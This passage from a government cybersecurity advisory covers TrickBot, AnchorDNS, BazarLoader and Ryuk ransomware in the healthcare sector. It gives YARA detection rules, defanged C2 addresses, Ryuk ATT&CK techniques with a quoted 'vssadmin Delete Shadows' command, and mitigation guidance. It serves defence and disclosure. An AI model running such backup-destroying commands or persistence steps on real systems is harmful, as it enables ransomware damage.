FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08} \n$deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 72 B8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand \n( uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\\2)) == 0x5A4D \nor \n$deob_x86 or $deob_x64 \n) \n}\n\nimport \"pe\" \nrule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains\" \nauthor = \"NCSC\" \nhash1 = \"ff8237252d53200c132dd742edc77a6c67565eee\" \nhash2 = \"c8299aadf886da55cb47e5cbafe8c5a482b47fc8\" \nstrings: \n$str1001 = {2F 31 30 30 31 2F 00} // /1001/ \n$strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL \n$ip1 = \"checkip.amazonaws.com\" ascii wide \n$ip2 = \"ipecho.net\" ascii wide \n$ip3 = \"ipinfo.io\" ascii wide \n$ip4 = \"api.ipify.org\" ascii wide \n$ip5 = \"icanhazip.com\" ascii wide \n$ip6 = \"myexternalip.com\" ascii wide \n$ip7 = \"wtfismyip.com\" ascii wide \n$ip8 = \"ip.anysrc.net\" ascii wide \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand $str1001 \nand ( \nfor any i in (0..pe.number_of_sections): ( \npe.sections[i].name == \".addr\" \n) \nor \n$strCtrl \nor \n6 of ($ip*) \n) \n}\n\nrule anchor_dns_check_random_string_in_dns_response { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off checking random string in DNS response\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8} \n$x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_default_result_execute_command { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off default result value and executing command\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00} \n$x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_pdbs { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off partial PDB paths\" \nauthor = \"NCSC\" \nhash1 = \"f0e575475f33600aede6a1b9a5c14f671cb93b7b\" \nhash2 = \"1304372bd4cdd877778621aea715f45face93d68\" \nhash3 = \"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\" \nhash4 = \"f96613ac6687f5dbbed13c727fa5d427e94d6128\" \nhash5 = \"46750d34a3a11dd16727dc622d127717beda4fa2\" \nstrings: \n$ = \":\\\\\\MyProjects\\\\\\secondWork\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\simsim\\\\\\anchorDNS\" \n$ = \":\\\\\\\\[JOB]\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\Anchor\\\\\\Win32\\\\\\Release\\\\\\Anchor_\" \n$ = \":\\\\\\Users\\\\\\ProFi\\\\\\Desktop\\\\\\data\\\\\\Win32\\\\\\anchor\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\n#### BazarLoader/BazarBackdoor\n\nBeginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.\n\nDeployment of the BazarLoader malware typically comes from phishing email and contains the following:\n\n * Phishing emails are typically delivered by commercial mass email delivery services. Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online filehosting solutions, typically purporting to be a PDF file.\n * This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.\n * Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decision, or other important tasks that require the attention of the recipient. \n * Some email communications have included the recipient\u2019s name or employer name in the subject line and/or email body.\n\nThrough phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:\n\n * `Report-Review26-10.exe`\n * `Review_Report15-10.exe`\n * `Document_Print.exe`\n * `Report10-13.exe`\n * `Text_Report.exe`\n\nBazar activity can be identified by searching the system startup folders and Userinit values under the `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon` registry key:\n\n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adobe.lnk`\n\nFor a comprehensive list of indicators of compromise regarding the BazarLocker and other malware, see <https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html>.\n\n#### Indicators\n\nIn addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. The following C2 servers are known to be associated with this malicious activity.\n\n * `45[.]148[.]10[.]92`\n * `170[.]238[.]117[.]187`\n * `177[.]74[.]232[.]124`\n * `185[.]68[.]93[.]17`\n * `203[.]176[.]135[.]102`\n * `96[.]9[.]73[.]73`\n * `96[.]9[.]77[.]142`\n * `37[.]187[.]3[.]176`\n * `45[.]89[.]127[.]92`\n * `62[.]108[.]35[.]103`\n * `91[.]200[.]103[.]242`\n * `103[.]84[.]238[.]3`\n * `36[.]89[.]106[.]69`\n * `103[.]76[.]169[.]213`\n * `36[.]91[.]87[.]227`\n * `105[.]163[.]17[.]83`\n * `185[.]117[.]73[.]163`\n * `5[.]2[.]78[.]118`\n * `185[.]90[.]61[.]69`\n * `185[.]90[.]61[.]62`\n * `86[.]104[.]194[.]30`\n * `31[.]131[.]21[.]184`\n * `46[.]28[.]64[.]8`\n * `104[.]161[.]32[.]111`\n * `107[.]172[.]140[.]171`\n * `131[.]153[.]22[.]148`\n * `195[.]123[.]240[.]219`\n * `195[.]123[.]242[.]119`\n * `195[.]123[.]242[.]120`\n * `51[.]81[.]113[.]25`\n * `74[.]222[.]14[.]27`\n\n#### Ryuk Ransomware\n\nTypically Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the [United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>), on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the `HERMES `tag but, in some infections, the files have `.ryk` added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.\n\nWhile negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products\u2014such as Cobalt Strike and PowerShell Empire\u2014in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.\n\nRyuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools\u2014such as net view, net computers, and ping\u2014to locate mapped network shares, domain controllers, and active directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management , and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.\n\nOnce dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a `.bat` file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.\n\nIn addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The `RyukReadMe` file placed on the system after encryption provides either one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.\n\nThe victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.\n\nInitial testing indicates that the `RyukReadMe` file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the `RyukReadMe` file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.\n\nAccording to MITRE, [Ryuk ](<https://attack.mitre.org/versions/v7/software/S0446/>)uses the ATT&CK techniques listed in table 1.\n\n_Table 1: Ryuk ATT&CK techniques_\n\n**Technique** | **Use** \n---|--- \nSystem Network Configuration Discovery [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016/>)] | Ryuk has called `GetIpNetTable` in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries. \n \nMasquerading: Match Legitimate Name or Location [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005/>)]\n\n| Ryuk has constructed legitimate appearing installation folder paths by calling `GetWindowsDirectoryW` and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as `C:\\Users\\Public`. \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)] | Ryuk has injected itself into remote processes to encrypt files using a combination of `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread`. \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057/>)] | Ryuk has called `CreateToolhelp32Snapshot` to enumerate all running processes. \nCommand and Scripting Interpreter: Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)] | Ryuk has used `cmd.exe` to create a Registry entry to establish persistence. \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083/>)] | Ryuk has called `GetLogicalDrives` to enumerate all mounted drives, and `GetDriveTypeW` to determine the drive type. \nNative API [[T1106](<https://attack.mitre.org/versions/v7/techniques/T1106/>)] | Ryuk has used multiple native APIs including `ShellExecuteW` to run executables; `GetWindowsDirectoryW` to create folders; and `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread` for process injection. \nAccess Token Manipulation [[T1134](<https://attack.mitre.org/versions/v7/techniques/T1134/>)] | Ryuk has attempted to adjust its token privileges to have the `SeDebugPrivilege`. \nData Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v7/techniques/T1486/>)] | Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of `.RYK`. Encrypted directories have had a ransom note of `RyukReadMe.txt` written to the directory. \nService Stop [[T1489](<https://attack.mitre.org/versions/v7/techniques/T1489/>)] | Ryuk has called `kill.bat` for stopping services, disabling services and killing processes. \nInhibit System Recovery [[T1490](<https://attack.mitre.org/versions/v7/techniques/T1490/>)] | Ryuk has used `vssadmin Delete Shadows /all /quiet` to delete volume shadow copies and `vssadmin resize shadowstorage` to force deletion of shadow copies created by third-party applications. \nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder [[T1047.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)] | Ryuk has used the Windows command line to create a Registry entry under `HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run` to establish persistence. \nImpair Defenses: Disable or Modify Tools [[T1562.001](<https://attack.mitre.org/versions/v7/techniques/T1562/001/>)] | Ryuk has stopped services related to anti-virus. \n \n### Mitigations\n\nFor a downloadable copy of IOCs, see AA20-302A.stix. For additional IOCs detailing this activity, see <https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>.\n\n#### Plans and Policies\n\nCISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans\u2014the practice of executing essential functions through emergencies (e.g., cyberattacks)\u2014to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.\n\n#### Network Best Practices\n\n * Patch operating systems, software, and firmware as soon as manufacturers release updates.\n * Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.\n * Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.\n * Use multi-factor authentication where possible.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Audit logs to ensure new accounts are legitimate.\n * Scan for open or listening ports and mediate those that are not needed.\n * Identify critical assets such as patient database servers, medical records, and teleheatlh and telework infrastructure; create backups of these systems and house the backups offline from the network.\n * Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.\n * Set antivirus and anti-malware solutions to automatically update; conduct regular scans.\n\n#### Ransomware Best Practices\n\nCISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:\n\n * Regularly back up data, air gap, and password protect backup copies offline.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.\n\n#### User Awareness Best Practices\n\n * Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats\u2014such as ransomware and phishing scams\u2014and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.\n * Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.\n\n#### Recommended Mitigation Measures\n\nSystem administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a TrickBot infection, review DNS logs and use the `XOR` key of `0xB9` to decode `XOR` encoded DNS requests to reveal the presence of `Anchor_DNS`, and maintain and provide relevant logs.\n\n### GENERAL RANSOMWARE MITIGATIONS \u2014 HPH SECTOR\n\nThis section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at <https://www.cisa.gov/publication/ransomware-guide>.\n\nCISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.\n\n#### Ransomware Prevention\n\n#### _Join and Engage with Cybersecurity Organizations_\n\nCISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:\n\n * Join a healthcare information sharing organization, H-ISAC: \n * Health Information Sharing and Analysis Center (H-ISAC): <https://h-isac.org/membership-account/join-h-isac/>\n * Sector-based ISACs - National Council of ISACs: <https://www.nationalisacs.org/member-isacs>\n * Information Sharing and Analysis Organization (ISAO) Standards Organization: <https://www.isao.org/information-sharing-groups/>\n * Engage with CISA and FBI, as well as HHS\u2014through the HHS Health Sector Cybersecurity Coordination Center (HC3)\u2014to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises. \n * CISA: [cisa.gov](<cisa.gov>), <https://us-cert.cisa.gov/mailing-lists-and-feeds>, [central@cisa.gov](<central@cisa.gov>)\n * FBI: [ic3.gov](<ic3.gov>), [www.fbi.gov/contact-us/field](<www.fbi.gov/contact-us/field>), [CyWatch@fbi.gov](<www.fbi.gov/contact-us/field>)\n * HHS/HC3: <http://www.hhs.gov/hc3>, [HC3@HHS.gov](<HC3@HHS.gov>)\n\nEngaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.\n\n#### _Follow Ransomware Best Practices_\n\nRefer to the best practices and references below to help manage the risk posed by ransomware and support your organization\u2019s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.\n\n * It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization. \n * Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.\n * Maintain regularly updated \u201cgold images\u201d of critical systems in the event they need to be rebuilt. This entails maintaining image \u201ctemplates\u201d that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.\n * Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. \n * Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.\n * Ensure all backup hardware is properly patched.\n * In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.\n * Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident. \n * Review available incident response guidance, such as CISA\u2019s Technical Approaches to Uncovering and Remediating Malicious Activity <https://us-cert.cisa.gov/ncas/alerts/aa20-245a>.\n * Help your organization better organize around cyber incident response.\n * Develop a cyber incident response plan.\n * The Ransomware Response Checklist, available in the [CISA and MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), serves as an adaptable, ransomware- specific annex to organizational cyber incident response or disruption plans.\n * Review and implement as applicable MITRE\u2019s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf>).\n * Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.\n * Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following: \n * Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.\n * Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.\n * Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.\n * Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.\n * Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.\n * Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.\n * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.\n * HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <http://www.hhs.gov/hc3>.\n\n#### _Hardening Guidance_\n\n * The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity>.\n * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for additional in-depth hardening guidance.\n\n#### _Contact CISA for These No-Cost Resources_\n\n * Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.\n * Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <https://www.cisa.gov/cyber-resource-hub>. \n * Assessments include Vulnerability Scanning and Phishing Campaign Assessment.\n * Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.\n * CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.\n * Contacts: \n * SLTT organizations: [CyberLiaison_SLTT@cisa.dhs.gov](<CyberLiaison_SLTT@cisa.dhs.gov>)\n * Private sector organizations: [CyberLiaison_Industry@cisa.dhs.gov](<CyberLiaison_Industry@cisa.dhs.gov>)\n\n#### _Ransomware Quick References_\n\n * _Ransomware: What It Is and What to Do About It _(CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: [https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf](<https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_%20Document-FINAL.pdf>)\n * Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <https://www.us-cert.cisa.gov/Ransomware>\n * HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at [www.hhs.gov/hc3](<www.hhs.gov/hc3>)\n * _Security Primer \u2013 Ransomware_ (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <https://www.cisecurity.org/white-papers/security-primer-ransomware/>\n * _Ransomware: Facts, Threats, and Countermeasures _(MS- ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: [https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/](<https://www.cisecurity.org/blog/ransomware-%20facts-threats-and-countermeasures/>)\n * HHS Ransomware Fact Sheet: <https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf>\n * NIST Securing Data Integrity White Paper: <https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft>\n\n#### Ransomware Response Checklist\n\n**Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.**\n\nShould your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), which contains steps for detection and analysis as well as containment and eradication.\n\n#### _Consider the Need For Extended Identification or Analysis_\n\nIf extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:\n\n * Recovered executable file\n * Copies of the readme file \u2013 DO NOT REMOVE the file or decryption may not be possible\n * Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)\n * Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)\n * Malware samples\n * Names of any other malware identified on your system\n * Encrypted file samples\n * Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)\n * Any PowerShell scripts found having executed on the systems\n * Any user accounts created in Active Directory or machines added to the network during the exploitation\n * Email addresses used by the attackers and any associated phishing emails\n * A copy of the ransom note\n * Ransom amount and whether or not the ransom was paid\n * Bitcoin wallets used by the attackers\n * Bitcoin wallets used to pay the ransom (if applicable)\n * Copies of any communications with attackers\n\nUpon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.\n\n * CISA \u2013 Advanced Malware Analysis Center: <https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf>\n * Remote Assistance \u2013 Request via [Central@cisa.gov](<Central@cisa.gov>)\n\n### Contact Information\n\nCISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.\n\n * State and Local Response Contacts\n * IT/IT Security Team \u2013 Centralized Cyber Incident Reporting\n * State and Local Law Enforcement\n * Fusion Center \n * Managed/Security Service Providers\n * Cyber Insurance \n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<Central@cisa.dhs.gov>).\n\nAdditionally, see [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for information on contacting\u2014and what to expect from contacting\u2014federal asset response and federal threat response contacts.\n\n### _Disclaimer_\n\nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <https://cisa.gov/tlp>.\n\n### References\n\n[CISA Emergency Services Sector Continuity Planning Suite ](<https://www.cisa.gov/emergency-services-sector-continuity-planning-suite>)\n\n[CISA MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>)\n\n[CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)\n\n[FBI PSA: \u201cHigh-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations\"](<https://www.ic3.gov/media/2019/191002.aspx>)\n\n[Health Industry Cybersecurity Tactical Crisis Response](<https://healthsectorcouncil.org/hic-tcr/>)\n\n[Health Industry Cybersecurity Practices (HICP) ](<http://www.phe.gov/405d>)\n\n[HHS - Ransomware Spotlight Webinar ](<https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51>)\n\n[HHS - Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients](<https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51>)\n\n[HHS - Ransomware Briefing ](<https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51>)\n\n[HHS - Aggressive Ransomware Impacts](<https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51>)\n\n[HHS - Ransomware Fact Sheet](<https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51>)\n\n[HHS - Cyber Attack 